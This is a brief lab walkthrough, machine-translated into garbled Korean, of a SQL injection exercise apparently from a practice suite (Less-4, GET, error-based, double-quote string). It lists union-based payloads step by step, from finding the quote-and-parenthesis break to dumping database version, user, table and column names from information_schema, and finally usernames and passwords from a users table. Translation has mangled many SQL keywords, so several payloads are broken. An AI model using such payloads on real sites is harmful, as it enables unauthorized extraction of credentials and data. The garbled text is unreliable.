적은-4 GET - 오류를 기반으로 두 배 지수 - 문자열
1.原页面
2.?id=1
3.?id=1 '
4
' ''1 \ '') LIMIT 0,1 '->' '(1) \ '') LIMIT 0,1
SQL :
선택 login_name은, 관리자 암호가 어디 ID = ( "ID") 제한 0,1
. = 1 5.id ") - +
6.?id=1") 3 + 주문에 의해
7 버전 정보 데이터베이스 쿼리
ID = 0 ") 1 SELECT 연합 (EU), 버전 (), 3 +?.
(8) 데이터베이스 쿼리 및 사용자 이름
? 위에서 언급 한 ID = 0 "연합)을 선택, 데이터베이스 (), 사용자 () - +
9 조회 테이블 이름
? ID = 0") 조합을 선택 (선택 GROUP_CONCAT (TABLE_NAME 1)을 INFORMATION_SCHEMA.TABLES 어디에서 TABLE_SCHEMA = ' 보안 '), 사용자 () - +
10. 열 이름 쿼리
ID = 0 ") 노조가 1을 선택 ? INFORMATION_SCHEMA.COLUMNS에서 (일부 GROUP_CONCAT (COLUMN_NAME) 여기서 TABLE_SCHEMA ='보안 '과 TABLE_NAME ='사용자 '), 3
11. 쿼리 사용자 이름과 암호
? ID = 0 ") 조합을 선택 사용자 - +에서 1, GROUP_CONCAT (사용자 이름, 0x3a, 비밀번호), (3)